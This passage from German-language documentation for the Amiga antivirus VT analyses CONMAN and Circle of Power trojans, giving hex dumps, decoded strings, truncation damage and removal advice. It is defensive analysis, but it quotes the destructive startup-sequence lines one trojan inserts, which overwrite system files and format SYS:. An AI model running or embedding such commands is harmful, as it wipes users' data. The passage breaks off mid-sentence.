gepackt: 12692 Bytes Laenge entpackt: 12312 Bytes KEINE verbogenen Vektoren NICHT resetfest VT bietet nur Loeschen an, da nichts sinnvolles im File ist. Im entpackten File wurden mit der $4EB9-4EF9-Methode ein "Dunkel- schalter" und ein verseuchtes Iprefs zusammengelinkt. Ablauf bei mir: - Bildschirm dunkel schalten - verseuchtes Iprefs nach c: kopieren - nach kurzer Zeit Reset (dadurch wird Iprefs aus startup-seq aufgerufen). - CONMAN-Iprefs-Trojan File Filename: Iprefs Laenge gepackt: 10820 Bytes Laenge entpackt: 14216 Bytes KEINE verbogenen Vektoren NICHT resetfest Kann sich NICHT weiterkopieren VT bietet nur Loeschen an, da jeder auf der Orig-WB-Disk ein sauberes Iprefs-File hat. Im Iprefsfile befindet sich mit der $4EB9-4EF9-Methode zusammen- gelinkt zuerst Iprefs und DANACH das Trojanteil. Trojanteil noch einmal gepackt: 1184 Bytes Trojanteil entpackt: 1584 Bytes Im entpackten Trojanteil ist zu lesen: 722941f9 00000274 20fc2043 4f4e20fc r)A....t . CON . 4d414e20 20fc3139 393551c9 ffec13fc MAN .1995Q..... ;....... 74726163 6b646973 6b2e6465 76696365 trackdisk.device 0000636f 6e6d616e 2e646576 69636500 ..conman.device. 646f732e 6c696272 61727900 000003ec dos.library..... Schadensverlauf: - Zuerst wird das Iprefsteil ausgefuehrt. - Danach wird das Trojanteil aktiviert. - Startet Prozess Prozessname: conman.device Dieser Prozess versucht ueber trackdisk.device (also nur Disk), Block 880, 882 und andere Blocknummern in Abhaengigkeit von $DFF006 zu zerstoeren. Fuer eine Testdisk habe ich 10 Min. ge- braucht. Danach war KEIN Prg. mehr lauffaehig. Im zerstoerten Block ist zu lesen: Block: 882 0000: 00434f4e 4d414e20 31393935 20434f4e .CONMAN 1995 CON 0010: 4d414e20 31393935 20434f4e 4d414e20 MAN 1995 CONMAN 0020: 31393935 20434f4e 4d414e20 31393935 1995 CONMAN 1995 ;usw. Sie sehen, da ist nichts mehr zu retten. Tut mir leid. Warum ein zerstoerter Block bei mir IMMER mit $0 anstatt $20 beginnt? Keine Ahnung. VT versucht den Prozess abzuschalten. Sie muessen aber mit einem Guru rechnen. Danke - CONMAN-LoadWB-Inst. File Typ A: Filename:recode Filelaenge ungepackt: 12088 Bytes Keine verbogenen Vektoren Nicht resetfest Es werden Befehle aus der dos.lib verwendet (inhibit, format), die erst ab KS #37 vorhanden sind. Mit der 4EB9-Methode wurden ein Programm (Cable) und das Trojan- teil zusammengelinkt. Im File ist zu lesen: 61727900 434c4928 30293a6e 6f20636f ary.CLI(0):no co 6d6d616e 64206c6f 61646564 00433a4c mmand loaded.C:L 6f616457 42000000 oadWB... VT bietet Ausbau an. Es sollte ein PP-gepacktes File mit der Laenge 9176 Bytes entstehen. Was man mit dem Cable-Prg V0.8 machen kann ? Keine Ahnung. Ablauf: Suche nach CLI(0)-Prozess. Falls da Ende Lege Prozess im Speicher an. Loadwb wird geschrieben. s.u. CONMAN-LoadWB-Troj. Zeitpause Reset ueber Exec.lib Typ B: Filename:QUARTEX Filelaenge ungepackt: 24596 Bytes Filelaenge ausgebaut: 21712 Bytes Es handelt sich um einen Filemonitor. Richtiger Name: HEX Rest siehe bei Typ A - CONMAN-LoadWB-Trojan File Filelaenge gepackt: 2088 Bytes Filelaenge entpackt: 2124 Bytes VT bietet nur loeschen an. Jeder sollte einen Original-LoadWB auf einer Disk an einem sicheren Ort haben. Bei einem Vergleich mit der VT-Funktion finden sie nach dem Entpacken: (Die Verschiebung um vier ist notwendig, da im Trojan- file im Header ein Hunk mehr eingetragen ist) Start 2.Obj.: +# 4 ;Orig WB ;Trojan ;...... 250: 4cec4e5d 4e75646f L.N]Nudo 254: 4cec4e5d 4eb90000 L.N]N... ^^^^ ^^^^^^^^ 258: 732e6c69 62726172 s.librar 25c: 00004e75 646f732e ..Nudos. ^^^^^^^^ 260: 79002d44 45425547 y.-DEBUG 264: 6c696272 61727900 library. 268: 2f532c44 454c4159 /S,DELAY 26c: 2d444542 55472f53 -DEBUG/S 270: 2f532c43 4c45414e /S,CLEAN 274: 2c44454c 41592f53 ,DELAY/S 278: 55502f53 2c4e4557 UP/S,NEW 27c: 2c434c45 414e5550 ,CLEANUP 280: 50415448 2f530024 PATH/S.$ 284: 2f532c4e 45575041 /S,NEWPA 288: 5645523a 206c6f61 VER: loa 28c: 54482f53 00245645 TH/S.$VE 290: 64776220 33382e39 dwb 38.9 294: 523a206c 6f616477 R: loadw 298: 20283330 2e332e39 (30.3.9 29c: 62203338 2e392028 b 38.9 ( 2a0: 32290a0d 0000776f 2)....wo 2a4: 33302e33 2e393229 30.3.92) Es handelt sich also um einen Orig-LoadWB-Befehl. Nur wurde ein RTS um sechs Bytes verschoben und davor ein Sprungbefehl zum Trojanteil eingebaut. Ausserdem mussten deshalb natuerlich einige andere Sprungbefehle erhoeht werden. Ich nehme an von Hand. Entpackt und Teile decodiert mit eori.b #$96,(a1) .... ist im Trojanteil zu lesen: 00000000 533a434f 4e4d414e 0000696e ....S:CONMAN..in 74756974 696f6e2e 6c696272 61727900 tuition.library. 434c4928 30293a6e 6f20636f 6d6d616e CLI(0):no comman 64206c6f 61646564 00005359 533a0000 d loaded..SYS:.. 20004241 440000c8 11434f4e 4d414e53 .BAD....CONMANS 20535953 4b494c4c 4552204d 45535341 SYSKILLER MESSA 47453a00 0100501b 594f5520 42455454 GE:...P.YOU BETT 45522054 414b4520 43415245 20444f4f ER TAKE CARE DOO 44494520 2d20534f 46545741 52452d50 DIE - SOFTWARE-P 49524143 59204953 20412043 52494d45 IRACY IS A CRIME 21200000 ! .. Ablauf: Der Original-LoadWB-Befehl wird abgearbeitet und vor einem RTS zuerst in den Trojanteil gesprungen. CLI(0)-Prozess schon da dann Ende Cmpi.w #$25,$14(a6) mind KS 37 sonst Ende Dann Prozess-Aufbau Im Prozess: Suche nach S:CONMAN (also eine schon bekannte Variante der Selbstsicherung fuer den Programierer). Falls gefunden Ende DosDelay $5000 = mehr als vier Minuten Inhibit SYS: Format (aus dos.lib) SYS: Name " " (s.o. 2000) BB mit BAD0 . Also ein Format QUICK der Block 0 und die Root veraendert. Zwei Zeilen DisplayAlert: CONMANS SYSK..... siehe oben. Nach einem Reset handelt es sich also um ein NoDOS-Medium. Versuchen Sie Ihre Festplatte oder Disk zu retten, indem Sie z.B. DiskSalv einsetzen. VT versucht den Prozess im Speicher zu finden und abzuschalten. Es koennte dabei zu einem GURU kommen. Da der Prozess aber nur 4 + X Minuten aktiv ist, bevor er sein Zerstoerungswerk beginnt, kann VT das Teil im Speicher nur gleich nach dem laden der WB finden. Hinweis: Wenn Sie die Programme im c-Verzeichnis mit VT-Prefs mit einer Pruefsumme versehen hatten, so muessen AUCH schon aeltere VTs beim veraenderten LoadWB-Befehl warnen. Ueber- legen Sie sich also bitte, ob Sie nicht ein Minimum an Vor- sorge betreiben wollen. Oder versehen Sie alle C-Programme mit dem gleichen Datum (copy c: ram:test all und zurueck). Wenn Sie dann in VT-Prefs Datum einstellen werden Sie auch auf den veraenderten LoadWB-Befehl aufmerksam, obwohl aeltere VTs diesen Trojan noch gar nicht kannten. UND !!!! 4EB9-Files sollten Sie IMMER vorsichtig werden lassen !!!!! Bitte lesen Sie (oben) bei 4EB9-Files nach. - CONMAN-LOOK-Trojan anderer Name: LOOK-BBS-Trojan s.u. - CONMAN-P-Trojan ??? Es handelt sich um gepackte Files. Verwendet wird ein modifizierter Packer. Diese Files haben bis jetzt IMMER irgendeine Zerstoerungs- routine enthalten. Seien Sie also bei dieser Meldung vorsichtig. Bekannte Texte im Pack-Header: 646f732e dos. 6c696272 6172792e 31323334 35363738 library.12345678 39414243 44454600 9ABCDEF. oder 42525543 BRUC 452f4445 464a414d 20435255 4e434845 E/DEFJAM CRUNCHE 5220a931 39393500 R .1995. Bekannte Teile: CONMAN-P-Run, -BBS, -Format Falls Sie weitere Texte finden, bitte ich um Zusendung. Danke - CONMAN-WorldClock-Trojan gegen BBS Laenge ungepackt: 21396 Bytes Filename: WorldClock (V1.16) Im File ist zu lesen: 00000000 24564552 3a20576f 726c642d ....$VER: World- 436c6f63 6b205631 2e313620 284e6f76 Clock V1.16 (Nov 20313320 31393934 2031343a 31313a32 13 1994 14:11:2 Mit der $4EB9-$4EF9-Link-Methode wurde ein Einbruchswerkzeug vor WorldClock gelinkt. Nennen wir das Trojan-Teil CONMAN-HYPER Typ A (siehe oben). Das Teil ist also nur fuer Sysops gefaehr- lich. Keine verbogenen Vektoren. Kein neuer Prozess im Speicher. Es wird KEIN Befehl ins C-Verzeichnis geschrieben. VT bietet nur loeschen an, da mindestens (Stand Maerz 95) schon WorldClock V1.18 erschienen ist. - COP-Varianten allgemein nach VT: Zerstoerung: Files werden gekuerzt und ein Text hineingeschrieben. Bitte KEINE Gleichsetzung mit Biomechanic (siehe oben). Biomechanic- Varianten verkuerzen ein File NICHT, aendern aber mindestens fuenf Bytes IM File und NICHT am Anfang !!!!! Gruppenbildung: Die Files wurden jeweils bis 3E9-Trojanbeginn ge- kuerzt. Files mit GLEICHER Trojancodelaenge und GLEICHEM Zer- stoerungstext wurden in einem Typ zugeordnet. - Typ-A Trojan-Teil allein 2 Hunks 1920 Bytes Filelaenge nach Zerstoerung 21 Bytes bekannter Filename: - NComm32 121896 Bytes - Typ-B Trojan-Teil allein 2 Hunks 1904 Bytes Filelaenge nach Zerstoerung 19 Bytes - LHA3.0 69888 Bytes - CED4 174500 Bytes - Typ-C Trojan-Teil allein 2 Hunks 1860 Bytes Filelaenge nach Zerstoerung 6 Bytes bekannter Filename: - DOpus5 347296 Bytes - Typ-D Trojan-Teil allein nicht moeglich, da nur ein Hunks Filelaenge nach Zerstoerung 5 Bytes bekannte Filenamen: - SInfo 2852 Bytes - Typ-E Trojan-Teil allein nicht moeglich, da kein 4EB9 Filelaenge nach Zerstoerung 38 Bytes - FutureTracker 317608 Bytes - Virusworkshop V5.0 135744 Bytes - Typ-F Trojan-Teil allein nicht moeglich, da kein 4EB9 Filelaenge nach Zerstoerung 20 Bytes - acp 71904 Bytes - Typ-G Trojan-Teil allein 2 Hunks 460 Bytes Filelaenge nach Zerstoerung 31 Bytes bekannte Filenamen: - CopKiller 8428 Bytes beide Files genau - cALLERSLOG.SFX 8428 Bytes gleicher Inhalt - Typ-H Trojan-Teil allein nicht moeglich, da kein 4EB9 Filelaenge nach Zerstoerung 63 Bytes bekannte Filenamen: - LZX130_680000EC 67680 Bytes - LZX130_680020 64896 Bytes - LZX130_680040 65385 Bytes - Typ-I Trojan-Teil allein nicht moeglich, da kein 4EB9 Filelaenge nach Zerstoerung 75 Bytes bekannte Filenamen: - ProTracker 4.0ß 336804 Bytes - LZX125_68000EC 68492 Bytes - LZX125_68020 65708 Bytes - LZX125_68040 65456 Bytes - Typ-J Trojan-Teil allein nicht moeglich, da kein 4EB9 Filelaenge nach Zerstoerung 71 Bytes bekannte Filenamen: - ACP-4.20 62384 Bytes - EXPRESS_4.20 345240 Bytes - Typ-K Trojan-Teil allein 2 Hunks 432 Bytes Filelaenge nach Zerstoerung 41 Bytes bekannte Filenamen: - dmv05.exe 36480 Bytes - TETRIS.EXE 21244 Bytes beide Files genau - TETRIS2.EXE 21244 Bytes gleicher Inhalt - Typ-L Trojan-Teil allein nicht moeglich, da kein 4EB9 Filelaenge nach Zerstoerung 31 Bytes bekannte Filenamen: - TP5_Andromeda.exe 40216 Bytes - TP5_Parallax.exe 39980 Bytes - TP5_SilentsDK.exe 39440 Bytes - TP5_Spaceballs.exe 38060 Bytes - TP5_TRSI.exe 37412 Bytes beide Files genau - BlueSky2.exe 37412 Bytes gleicher Inhalt - Typ-M Trojan-Teil allein nicht moeglich, da kein 4EB9 Filelaenge nach Zerstoerung 31 Bytes bekannter Filename: - PHA_XMAS.EXE 461384 Bytes - Typ-N Trojan-Teil allein nicht moeglich, da kein 4EB9 Filelaenge nach Zerstoerung 75 Bytes bekannte Filenamen: - QBTools3 227716 Bytes - COP-Trojan CIRCLE OF POWER Zerstoerungsfile KEINE Vermehrung KEINE verbogenen Vektoren Mit der $4EB9-$4EF9-Linkmethode wurde ein Zerstoerungsteil an andere Programme angelinkt. Manchmal auch nur zwei Hunks mit Trojanteil und der Rest viel Muell. Die jeweiligen Versionsnummern duerfte es im Maerz 95 nicht geben. Deshalb bietet VT NUR Loeschen an und nicht Ausbau. Schaeden: Files in bestimmten Verzeichnissen werden gekuerzt und enthalten nur noch einen Text. siehe unten Da ist NICHTS mehr zu retten. Tut mir leid. Typ A: (weil er zuerst entdeckt wurde) Laenge des Zerstoerungsteils: 1920 Bytes Entdeckt an NComm32 Laenge gepackt: 121896 Bytes Laenge entpackt: 226116 Bytes Im entpackten File ist zu lesen: 4eaeffa6 70004cdf 400c4e75 43495243 N...p.L.@.NuCIRC 4c45204f 4620504f 57455220 31393935 LE OF POWER 1995 2100733a 00004e71 2f077e00 60144a2c !.s:..Nq/.~.`.J, ;..... ^^ 4eaeffa6 70004cdf 400c4e75 43495243 N...p.L.@.NuCIRC 4c45204f 4620504f 57455220 31393935 LE OF POWER 1995 21006262 733a0000 2f077e00 60144a2c !.bbs:../.~.`.J, ;..... ^^^^ 523a204e 436f6d6d 20332e32 20203138 R: NComm 3.2 18 2d4d6172 2d393500 00004e43 6f6d6d20 -Mar-95...NComm Files aus s: und bbs: (siehe oben) werden auf 21 Bytes gekuerzt. In so einem File ist dann zu lesen: 0000: 43495243 4c45204f 4620504f 57455220 CIRCLE OF POWER 0010: 31393935 21 1995! Typ B: Laenge des Zerstoerungsteils: 1904 Bytes Entdeckt an LHA3.0 Laenge gepackt: 69888 Bytes Laenge entpackt: 105808 Bytes Entpackt kann man ein lha 1.5 finden. Entdeckt an CED4 Laenge gepackt + 3E8-*Art-Hunk: 174500 Bytes Laenge entpackt: 314216 Bytes Hier wurde also sogar noch ein 3E8-*Art-Hunk vorgehaengt um die Packererkennung zu erschweren. Im File ist jeweils zu lesen: 4cdf400c 4e756465 76733a00 733a0000 L.@.Nudevs:.s:.. 656e7661 72633a00 6e636f6d 6d3a0000 envarc:.ncomm:.. 6c696273 3a004349 52434c45 204f4620 libs:.CIRCLE OF 504f5745 52273935 3a004e71 2f077e00 POWER'95:.Nq/.~. Files aus devs: s: envarc: ncomm: und libs: werden auf 19 Bytes gekuerzt. In so einem File ist dann zu lesen: z.B. arp.library 0000: 43495243 4c45204f 4620504f 57455227 CIRCLE OF POWER' 0010: 39353a 95: Hinweis: sollte ein Verzeichnis nicht existieren, so hat das Teil sich bei mir durch einen Requester verraten. Typ C: Entdeckt an DOpus5 Laenge gepackt + 3E8-*Art-Hunk: 347296 Bytes Laenge entpackt: 547676 Bytes Hier wurde also sogar noch ein 3E8-*Art-Hunk vorgehaengt um die Packererkennung zu erschweren. Im File ist zu lesen: 4cdf400c 4e756465 76733a00 733a0000 L.@.Nudevs:.s:.. 6c696273 3a00434f 50273935 00004e71 libs:.COP'95..Nq Files aus devs: s: und libs: werden auf 6 Bytes gekuerzt. Es fehlt also envarc und ncomm . In so einem File ist dann zu lesen: z.B, diskfont.library 0000: 434f5027 39350000 00000000 00000000 COP'95.......... Da ist leider NICHTS mehr zu retten. Hinweis: Bei Tests wurden auch zerstoerte Files mit der Laenge 0 erzeugt. - COP-Sinfo-Trojan (COP Typ D ???) Zerstoerungsteil Laenge ungepackt: 2852 Bytes Filename: Sinfo Keine verbogenen Vektoren Das File kann Sich SELBST NICHT vermehren. Unterschied zu anderen COP-Typen: Eigenstaendiges Programm und NICHT angelinkt. In der File-ID wird behauptet: SYSTEMINFO V1.0 BY JÜRGEN HÜNSMANN 1995! Das Trojanteil ist teilweise codiert. Die startup-sequence wird veraendert: startup-sequence vorher: ;cls startup-sequence nachher: list s: >ram:cop lformat "echo cop! >s:%n" execute ram:cop list libs: >ram:cop lformat "echo cop! >libs:%n" execute ram:cop list c: >ram:cop lformat "echo cop! >c:%n" execute ram:cop sys:system/format >nil: drive sys: name suckmycop! ffs noicons quick ;cls Es werden also vor der echten startup-sequence einige Zeilen einge- fuegt. Diese Zeilen werden nach einem Reset zuerst abgearbeitet. Im Ram entsteht ein File cop mit dem Inhalt am Schluss: echo cop! >c:List echo cop! >c:Run echo cop! >c:AddBuffers echo cop! >c:Mount echo cop! >c:LoadWB echo cop! >c:CD echo cop! >c:Execute echo cop! >c:cls echo cop! >c:Echo echo cop! >c:NewCLI echo cop! >c:EndCLI echo cop! >c:Makedir echo cop! >c:546071 echo cop! >c:546043 echo cop! >c:RunBack echo cop! >c:Dir Wenn Sie noch mehr in c: stehen haben, wuerden da noch mehr Zeilen stehen. Hinweis: mit Workbenchbefehlen in c: von KS1.3 werden nur Files mit Zahlennamen z.B. 546071 s.o. erzeugt, aber nichts zerstoert. Mit neueren Workbenchbefehlen: Die Unterverzeichnisse s, libs und c werden durchlaufen und alle gefundenen Files auf 5 Bytes gekuerzt. Inhalt danach z.B.: CD 0000: 636f7021 0a000000 00000000 00000000 cop!............ Tut mir leid, da ist nichts mehr zu retten. Die "format-Zeile" in der startup-sequence wurde bei Tests bei mir NIE ausgefuehrt, sondern mit returncode 20 abgebrochen. VT bietet nur loeschen an, da Sinfo keine andere Funktion hat. Bitte ueberpruefen Sie UNBEDINGT auch ihre startup-sequence und entfernen Sie bei Bedarf die ersten Zeilen. - COP-FT-Trojan Typ E Zerstoerungsfile Bekannte Filenamen: FutureTracker Laenge ungepackt: 317608 Bytes Virusworkshop V5.0 Laenge ungepackt: 135744 Bytes Im Netz war zu lesen, dass die jeweiligen Programmierer die Files NICHT geschrieben haben. KEIN File enthaelt das Programm, das wegen des Filenamens vermutet werden koennte. Das File besteht jeweils aus der COP-Zerstoerungsroutine und einem Musikstueck. Keine verbogenen Vektoren Die Files koennen Sich SELBST NICHT vermehren. Decodiert (NOT.B D0) ist im File zu lesen: 04c70000 00000000 0152434f 4e3a302f .........RCON:0/ 30302f31 30303030 2f313030 30302f43 00/10000/10000/C 6f646564 20627920 4b68616e 616e2028 oded by Khanan ( ;....... 701b5b33 303b3430 6d5b634f 705d3a20 p.[30;40m[cOp]: 4b68616e 616e202f 20436972 636c6520 Khanan / Circle 4f662050 6f776572 203a5b63 4f705d64 Of Power :[cOp]d 6576733a 00733a00 656e7661 72633a00 evs:.s:.envarc:. 4c3a004e 434f4d4d 3a00 L:.NCOMM:. Ablauf: Es wird ein Fenster geoeffnet und ein COP-Text ausgegeben. Das MUSS dem User auffallen. Empfehle sofort RESET. Vielleicht ist der Schaden noch zu begrenzen. Vorsicht: die Festplatte duerfte dann allerdings Validating-Probleme haben. Die Files in devs, s, envarc, L und NCOMM werden auf 38 Bytes gekuerzt. Inhalt danach z.B.: Port-Handler 0000: 5b634f70 5d3a204b 68616e61 6e202f20 [cOp]: Khanan / 0010: 43697263 6c65204f 6620506f 77657220 Circle Of Power 0020: 3a5b634f 705d0000 :[cOp].. Tut mir leid, da ist nichts mehr zu retten. - COP-Acp-Trojan Typ F Zerstoerungsfile acp Laenge: 71904 Bytes KEINE verbogenen Vektoren KEINE Vermehrung Taeuschung durch File-ID: AmiExpress 5.0 Sehr starke Aehnlichkeit mit Typ E. Decodiert (NOT.B D0) ist im File zu lesen: 434f4e3a 302f3030 2f313030 30302f35 CON:0/00/10000/5 302f436f 64656420 6279204b 68616e61 0/Coded by Khana 6e202620 4772616a 73616820 2863292d n & Grajsah (c)- ;....... 20202020 20202020 3a5b634f 705d0a5b :[cOp].[ 634f705d 3a204b68 616e616e 203a5b63 cOp]: Khanan :[c 4f705d64 6576733a 00733a00 6262733a Op]devs:.s:.bbs: 004c3a00 4e434f4d 4d3a0000 20245645 .L:.NCOMM:.. $VE 523a2041 43502056 352e3020 2843292d R: ACP V5.0 (C)- Ablauf: Es wird ein Fenster geoeffnet und ein COP-Text ausgegeben. Das MUSS dem User auffallen. Empfehle sofort RESET. Vielleicht ist der Schaden noch zu begrenzen. Vorsicht: die Festplatte duerfte dann allerdings Validating-Probleme haben. Die Files in devs, s, bbs, L und NCOMM werden auf 20 Bytes gekuerzt. Inhalt danach z.B.: printer.device 0000: 5b634f70 5d3a204b 68616e61 6e203a5b [cOp]: Khanan :[ 0010: 634f705d cOp] Tut mir leid, da ist nichts mehr zu retten. VT bietet nur Loeschen an, da ACP V5.0 eine Faelschung sein duerfte. - COP-Trojan Typ G Zerstoerungsfile CopKiller Laenge: 8428 Bytes in COPKILLE.LHA cALLERSLOG.SFX Laenge: 8428 Bytes in MST-CA12.LHA Die Files sind aufs Byte GENAU gleich und werden nur unter verschiedenen Namen weitergegeben. KEINE verbogenen Vektoren KEINE Vermehrung Taeuschung durch ungepackten Text am Fileende: f0760bf2 436f7070 4b696c6c 65722076 .v..CoppKiller v 312e3120 6279204a 6f6c6c65 202f2053 1.1 by Jolle / S 484920a9 20313939 350a00ff 004a2216 HI . 1995....J". Decodiert (NOT.B D0 und addi.b #$7F,d0) ist im File zu lesen: 79000000 011f0000 00000000 00ea5b63 y.............[c 4f705d3a 2053636f 74636820 26204b68 Op]: Scotch & Kh 616e616e 206f6e20 746f7572 20273935 anan on tour '95 203a5b63 4f705d64 6576733a 00733a00 :[cOp]devs:.s:. 6262733a 004c3a00 4e434f4d 4d3a0000 bbs:.L:.NCOMM:.. Auf Grund eines Programmierfehlers werden "nur" die Files in devs: auf 41 Bytes gekuerzt. Inhalt z.B.: printer.device 0000: 5b634f70 5d3a2053 636f7463 68202620 [cOp]: Scotch & 0010: 4b68616e 616e206f 6e20746f 75722027 Khanan on tour ' 0020: 3935203a 5b634f70 5d 95 :[cOp] Tut mir leid, da ist nichts mehr zu retten. VT bietet nur Loeschen an. Groessere Teile des Zerstoerungs-Files werden NIE erreicht. Sie sind also nur zur Fileverlaengerung gedacht. - COP-LZX-Trojan Typ H Zerstoerungsfiles Ein Archiv mit angeblich LZX130 . ALLE LZX in diesem Archiv waren verseucht. KEINE verbogenen Vektoren KEINE Vermehrung VT bietet nur Loeschen an, da sich jeder die Original-LZX120 (ja an diese wurde gelinkt) besorgen kann. Decodiert (NOT.B D0 und addi.b #$7F,d0) ist im File zu lesen: 3d434952 434c45b7 4f46b750 =CIRCLE.OF.P 4f574552 3d205b20 54484520 52455455 OWER= [ THE RETU 524e204f 46205448 4520504f 57455220 RN OF THE POWER 50454f50 4c452120 50484541 52205553 PEOPLE! PHEAR US 21205d6e 636f6d6d 00006262 73000064 ! ]ncomm..bbs..d 65767300 00730000 656e7661 72630000 evs..s..envarc.. 6c696273 00000000 libs.... Die Files in den SubDirs sollen auf #63 Bytes gekuerzt werden. printer.device 0000: 3d434952 434c45b7 4f46b750 4f574552 =CIRCLE.OF.POWER 0010: 3d205b20 54484520 52455455 524e204f = [ THE RETURN O 0020: 46205448 4520504f 57455220 50454f50 F THE POWER PEOP 0030: 4c452120 50484541 52205553 21205d00 LE! PHEAR US! ]. - COP-TypI-Trojan Typ I Zerstoerungsfile siehe auch Typ N Filename: ProTracker 4.0ß Laenge: 336804 Bytes Filename: LZX V1.25T Laengen: 68492, 65708, 65456 Bytes KEINE verbogenen Vektoren KEINE Vermehrung VT bietet nur Loeschen an, da die Versionsnummern im Moment nicht erschienen sind. Decodiert (NOT.B D0 und addi.b #$7F,d0) ist im File zu lesen: 3d43 =C 4952434c 45b74f46 b7504f57 45523d20 IRCLE.OF.POWER= 5b205745 20415245 20424143 4b212054 [ WE ARE BACK! T 48452052 45545552 4e204f46 20544845 HE RETURN OF THE 20504f57 45522050 454f504c 4521202f POWER PEOPLE! / 20475259 5a4f5220 5d6e636f 6d6d0000 GRYZOR ]ncomm.. 62627300 00656e76 61726300 00730000 bbs..envarc..s.. 64657673 00006c69 62730000 devs..libs.. Die Files in den Subdirs sollen auf #75 Bytes gekuerzt werden. Text siehe oben. Die Files sind NICHT zu retten. Hauptunterschied von Typ I zu Typ H: AttemptLockDosList - COP-nicht-lauff Typ J Bekannte Filenamen: ACP-4.20 Laenge: 62384 Bytes EXPRESS_4.20 Laenge: 345240 Bytes Nach FileID ein Ami-Express-File Der Nachprogrammierer war nicht in der Lage, die Decodier-Schleife sauber einzubauen. SUB statt ADD waere richtig gewesen !! Deshalb kommt es IMMER zu einem GURU. Wenn man SUB verwendet haette, waeren die zerstoerten Files 71 Bytes lang und im Trojan waere zu lesen: 3d434952 434c45b7 =CIRCLE. 4f46b750 4f574552 3d205b20 54484520 OF.POWER= [ THE 54455252 4f522057 494c4c20 4e455645 TERROR WILL NEVE 52205354 4f502c20 50484541 52205448 R STOP, PHEAR TH 45204d49 47485459 20434f50 21205d64 E MIGHTY COP! ]d 6f732e6c 69627261 7279006e 636f6d6d os.library.ncomm 00006262 73000064 65767300 00730000 ..bbs..devs..s.. 6c696273 0000656e 76617263 libs..envarc Warum VT die Files dann doch erkennt ? Damit die "Erbsenzaehler" ruhig schlafen koennen !! - COP-TypK-Trojan Filename: dmv05.exe Laenge: 36480 Bytes Dieses File ist NICHT lauffaehig. Am Anfang sind mehrere Texthunks und am Ende ein FlidID-Hunk. So ist das File NICHT lauffaehig. Entfernen Sie mit VT die Texthunks und den FlidID-Hunk. (Die Meldung "Texthunk gefunden" sollte Sie also IMMER zu einem Ausbau an einer KOPIE bewegen !!!). VT meldet danach $4EB9-Hunk gefunden. Auch so ist das File NICHT lauffaehig. Der erste Teil ist ein Imploder-File. Dieser Teil verhindert zum Glueck die Lauffaehigkeit. Ein Entpackversuch endet mit GURU. Der zweite Teil ist das Zerstoerungsteil. Dieses Teil allein IST LAUFFAEHIG !!! COP-TypK Laenge: 432 Bytes Decodiert ist zu lesen: 6c696272 61727900 64657673 3a00733a library.devs:.s: 006c6962 733a0046 61757354 202f2063 .libs:.FausT / c 4952434c 45206f46 20704f57 45522739 IRCLE oF pOWER'9 35202d20 54525545 20504f57 45522100 5 - TRUE POWER!. Die Files in den Subdirs sollen auf #41 Bytes gekuerzt werden. Die Files sind NICHT zu retten. Textinhalt: FausT.... Hinweis 96-10-25: Es sind zwei weitere Files aufgetaucht. Diese Files sind LAUF- FAEHIG !!! TETRIS.EXE 21244 Bytes TETRIS2.EXE 21244 Bytes Mit der 4EB9-Methode wurde das Zerstoerungsteil als 1.Teil ein- gelinkt. - COP-TypL-Trojan Zerstoerung anderer Name: DUNGEON-OF-DOOM KEINE verbogenen Vektoren KEINE Vermehrung Bekannte Filenamen und Laengen: TP5_Andromeda.exe 40216 TP5_Parallax.exe 39980 TP5_SilentsDK.exe 39440 TP5_Spaceballs.exe 38060 TP5_TRSI.exe 37412 beide Files BlueSky2.exe 37412 genau gleich Nach FileID 40k-Intros Die Files enthalten jede Menge Muell, der nie erreicht wird. Das Teil meldet sich im Cli mit DOS-Extender... Decodiert ist im File zu lesen: 2b34 +4 362d3632 302d3133 31343120 2d204455 6-620-13141 - DU 4e47454f 4e204f46 20444f4f 4d737973 NGEON OF DOOMsys 3a00444f 532d4578 74656e64 65722056 :.DOS-Extender V 312e3520 a9313939 3320466f 726e6178 1.5 .1993 Fornax 69730a00 556e6162 6c652074 6f207772 is..Unable to wr 69746520 53776170 66696c65 2e205265 ite Swapfile. Re 6d6f7665 20777269 74652d70 726f7465 move write-prote 6374696f 6e20616e 64207265 7472792e ction and retry. 0a004372 65617469 6e67206e 65772053 ..Creating new S 77617066 696c652e 20506c65 61736520 wapfile. Please 686f6c64 2e2e2e00 646f732e 6c696272 hold....dos.libr 61727900 6e636f6d 6d000062 62730000 ary.ncomm..bbs.. 64657673 00007300 006c6962 73000065 devs..s..libs..e 6e766172 6300 nvarc. Die Files in den Subdirs sollen auf #31 Bytes gekuerzt werden. Die Files sind NICHT zu retten. Textinhalt: +46-620-13141 - DUNGEON OF DOOM Hinweis: Ich habe die Teile hier eingereiht, auch wenn im zerstoerten File nicht COP zu lesen ist. Aber die Decodier- Routine mit z.B. d7 entspricht dem COP-Muster. - COP-TypM-Trojan Zerstoerung anderer Name: DUNGEON-OF-DOOM KEINE verbogenen Vektoren KEINE Vermehrung Bekannte Filenamen und Laengen: PHA_XMAS.EXE 461384 Ein Typ L mit Textaenderungen und Unterverzeichnisse (z.B. ncomm) fehlen. Duerfte aelter sein als Typ L. Habe aber Typ L zuerst bekommen. Decodiert ist im File zu lesen: 2b34 362d3632 302d3133 +46-620-13 31343120 2d204455 4e47454f 4e204f46 141 - DUNGEON OF 20444f4f 4d737973 3a005068 656e6f6d DOOMsys:.Phenom 656e6120 444f532d 45787465 6e646572 ena DOS-Extender 2056312e 3120a931 39393320 62792050 V1.1 .1993 by P 686f746f 6e0a0055 6e61626c 6520746f hoton..Unable to 20777269 74652053 77617066 696c652e write Swapfile. 2052656d 6f766520 77726974 652d7072 Remove write-pr 6f746563 74696f6e 20616e64 20726574 otection and ret 72792e0a 00437265 6174696e 67206e65 ry...Creating ne 77205377 61706669 6c652e20 506c6561 w Swapfile. Plea 73652068 6f6c642e 2e2e0064 6f732e6c se hold....dos.l 69627261 727900 ibrary. Hinweis: Ich habe die Teile hier eingereiht, auch wenn im zerstoerten File nicht COP zu lesen ist. Aber die Decodier- Routine mit z.B. d7 entspricht dem COP-Muster. - COP-TypN-Trojan Zerstoerungsfile siehe auch Typ I Filename: QBTools3 Laenge: 227716 Bytes KEINE verbogenen Vektoren KEINE Vermehrung Die Files in den Subdirs sollen auf #75 Bytes gekuerzt werden. Text siehe oben. Die Files sind NICHT zu retten. Der geschriebene Text entspricht GENAU Typ I Aber: - die einzelnen Sub-Dirs sind vertauscht - der eigentliche Trojan-Code ist ein paar Bytes laenger - ein zusaetzlicher Text, der NICHT ins File geschrieben wird, ist vorhanden: "Please hold while scanning directory structure." - Copy_LX-Trojan Zerstoerungsfile siehe bei Copy-SAVE-Trojan Name geaendert, da mit LX103 der Linkvorgang NICHT erzeugt werden konnte. Das soll 